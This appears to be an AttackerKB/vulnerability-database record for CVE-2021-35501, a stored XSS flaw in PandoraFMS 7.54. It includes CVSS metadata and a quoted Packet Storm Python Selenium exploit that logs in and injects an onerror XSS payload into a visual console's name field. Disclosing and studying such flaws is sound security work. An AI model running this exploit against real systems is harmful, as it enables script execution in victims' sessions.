ID AKB:64B1C754-763D-4EF4-95D4-31D3E479C599
Type attackerkb
Reporter AttackerKB
Modified 2021-07-02T00:00:00
Description
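PandoraFMS <=7.54 allows Stored XSS by placing a payload in the name field of a visual console. When a user or an administrator visits the console, the XSS payload will be executed. The CVSS 3.1 vector recorded for this entry (PR:L, UI:R, S:C) means the payload has to be stored by an authenticated low-privileged account and runs only once a victim opens the console. The weakness is classified as CWE-79, i.e. the console name is not neutralized before it is rendered in the page.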
Recent assessments:
nu11secur1ty at July 12, 2021 8:57am UTC reported:
PandoraFMS <=7.54 allows Stored XSS by placing a payload in the name field of a visual console. When a user or an administrator visits the console, the XSS payload will be executed.
Reproduce:
Stored XSS
<https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-35501>
Proof:
<https://streamable.com/yjr0fm>
PHPSESSID PWNED
<https://packetstormsecurity.com/files/163466/Pandora-FMS-7.54-Cross-Site-Scripting.html>
<https://streamable.com/b7xt4g>
Assessed Attacker Value: 3
Assessed Exploitability: 4
{"id": "AKB:64B1C754-763D-4EF4-95D4-31D3E479C599", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-35501", "description": "PandoraFMS <=7.54 allows Stored XSS by placing a payload in the name field of a visual console. When a user or an administrator visits the console, the XSS payload will be executed.\n\n \n**Recent assessments:** \n \n**nu11secur1ty** at July 12, 2021 8:57am UTC reported:\n\nPandoraFMS <=7.54 allows Stored XSS by placing a payload in the name field of a visual console. When a user or an administrator visits the console, the XSS payload will be executed.\n\n# Reproduce:\n\n * * Stored XSS \n<https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-35501>\n\n# Proof:\n\n<https://streamable.com/yjr0fm>\n\n# PHPSESSID PWNED\n\n<https://packetstormsecurity.com/files/163466/Pandora-FMS-7.54-Cross-Site-Scripting.html> \n<https://streamable.com/b7xt4g>\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 4\n", "published": "2021-06-25T00:00:00", "modified": "2021-07-02T00:00:00", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "href": "https://attackerkb.com/topics/2JX8a4WkkC/cve-2021-35501", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35501", "https://k4m1ll0.com/cve-pandorafms754-chained-xss-rce.html", "http://packetstormsecurity.com/files/163466/Pandora-FMS-7.54-Cross-Site-Scripting.html"], "cvelist": ["CVE-2021-35501"], "immutableFields": [], "lastseen": "2021-07-24T19:44:10", "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-35501"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163466"]}], "rev": 4}, "score": {"value": 5.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-35501"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163466"]}]}, "exploitation": null, "vulnersScore": 5.7}, "attackerkb": {"attackerValue": 3, 
"exploitability": 4}, "wildExploited": false, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35501"], "Miscellaneous": ["https://k4m1ll0.com/cve-pandorafms754-chained-xss-rce.html", "http://packetstormsecurity.com/files/163466/Pandora-FMS-7.54-Cross-Site-Scripting.html"]}, "tags": ["common_enterprise", "difficult_to_patch", "default_configuration", "requires_interaction"], "mitre_vector": {"Execution": ["Command and Scripting Interpreter: Python(Validated)", "Command and Scripting Interpreter: JavaScript/JScript(Validated)"]}, "last_activity": "2021-07-12T08:57:00", "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, "edition": 2, "scheme": null, "_state": {"wildexploited": 1647356732, "dependencies": 1646226602}, "_internal": {"wildexploited_cvelist": null}}
{"packetstorm": [{"lastseen": "2021-07-13T16:14:01", "description": "", "published": "2021-07-12T00:00:00", "type": "packetstorm", "title": "Pandora FMS 7.54 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-35501"], "modified": "2021-07-12T00:00:00", "id": "PACKETSTORM:163466", "href": "https://packetstormsecurity.com/files/163466/Pandora-FMS-7.54-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: XSS vulnerability for (keywords) searching parameter in pandorafms-754/pandora_console/ visual console \n# Author: @nu11secur1ty \n# Testing and Debugging: @nu11secur1ty \n# Date: 07.12.2021 \n# Vendor: https://pandorafms.com/ \n# Link: https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/754/PandoraFMS7.0NG.754.x86_64.iso/download \n# CVE: CVE-2021-35501 \n# Proof: \nhttps://github.com/nu11secur1ty/CVE-mitre/blob/main/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability.gif \n \n[+] Exploit Source: \n \n### Exploit \n \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# CVE-2021-35501 \n \nfrom selenium import webdriver \nimport time \nimport os, sys \n \n \n# Vendor: https://pandorafms.com/ \nwebsite_link=\"http://192.168.1.7/pandora_console/index.php\" \n \n# enter your login username \nusername=\"nu11secur1ty\" \n \n# enter your login password \npassword=\"password\" \n \n#enter the element for username input field \nelement_for_username=\"nick\" \n \n#enter the element for password input field \nelement_for_password=\"pass\" \n \n#enter the element for submit button \nelement_for_submit=\"login_button\" \n \n \n#browser = webdriver.Safari() #for macOS users[for others use chrome vis \nchromedriver] \nbrowser = webdriver.Chrome() #uncomment this line,for chrome users \n#browser = webdriver.Firefox() #uncomment this line,for chrome users \n \ntime.sleep(1) \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) 
\nusername_element.send_keys(username) \n \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \n \nsignInButton = browser.find_element_by_name(element_for_submit) \nsignInButton.click() \n \n# Exploit Pandora FMS 755 \n# Payload \nbrowser.get((\" \nhttp://192.168.1.7/pandora_console/index.php?sec=network&sec2=godmode/reporting/visual_console_builder \n\")) \n \ntime.sleep(1) \n \n### Inner text... \nbrowser.execute_script(\"document.querySelector('[name=\\\"name\\\"]').value = \n'<img src=1 onerror=alert(`Please_fix_it`)>'\") \ninput(\"Select Application from Group and Press Enter to continue...\") \nbrowser.execute_script(\"document.querySelector('[name=\\\"update_layout\\\"]').click()\") \ntime.sleep(3) \nos.system(\"python check_PoC.py\") \nbrowser.close() \n \nprint(\"The payload is deployed, your visual console is PWNED...\\n\") \n \nexcept Exception: \n#### This exception occurs if the element are not found in the webpage. 
\nprint(\"Sorry, but something is not ok\") \n \n \n### Check \n \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# CVE-2021-35501 \n \nfrom selenium import webdriver \nimport time \n \n# Vendor: https://pandorafms.com/ \nwebsite_link=\" \nhttp://192.168.1.7/pandora_console/index.php?sec=network&sec2=godmode/reporting/map_builder \n\" \n \n# enter your login username \nusername=\"nu11secur1ty\" \n \n# enter your login password \npassword=\"password\" \n \n#enter the element for username input field \nelement_for_username=\"nick\" \n \n#enter the element for password input field \nelement_for_password=\"pass\" \n \n#enter the element for submit button \nelement_for_submit=\"login_button\" \n \n \n#browser = webdriver.Safari() #for macOS users[for others use chrome vis \nchromedriver] \nbrowser = webdriver.Chrome() #uncomment this line,for chrome users \n#browser = webdriver.Firefox() #uncomment this line,for chrome users \n \ntime.sleep(1) \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \n \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \n \nsignInButton = browser.find_element_by_name(element_for_submit) \nsignInButton.click() \nexcept Exception: \n#### This exception occurs if the element are not found in the webpage. \nprint(\"Sorry, but something is not ok\") \n \n \n`\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/163466/pandorafms754-xss.txt"}], "cve": [{"lastseen": "2022-03-23T18:49:13", "description": "PandoraFMS <=7.54 allows Stored XSS by placing a payload in the name field of a visual console. 
When a user or an administrator visits the console, the XSS payload will be executed.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-25T16:15:00", "type": "cve", "title": "CVE-2021-35501", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35501"], "modified": "2021-09-14T14:36:00", "cpe": ["cpe:/a:pandorafms:pandora_fms:754"], "id": "CVE-2021-35501", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35501", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:pandorafms:pandora_fms:754:*:*:*:*:*:*:*"]}]}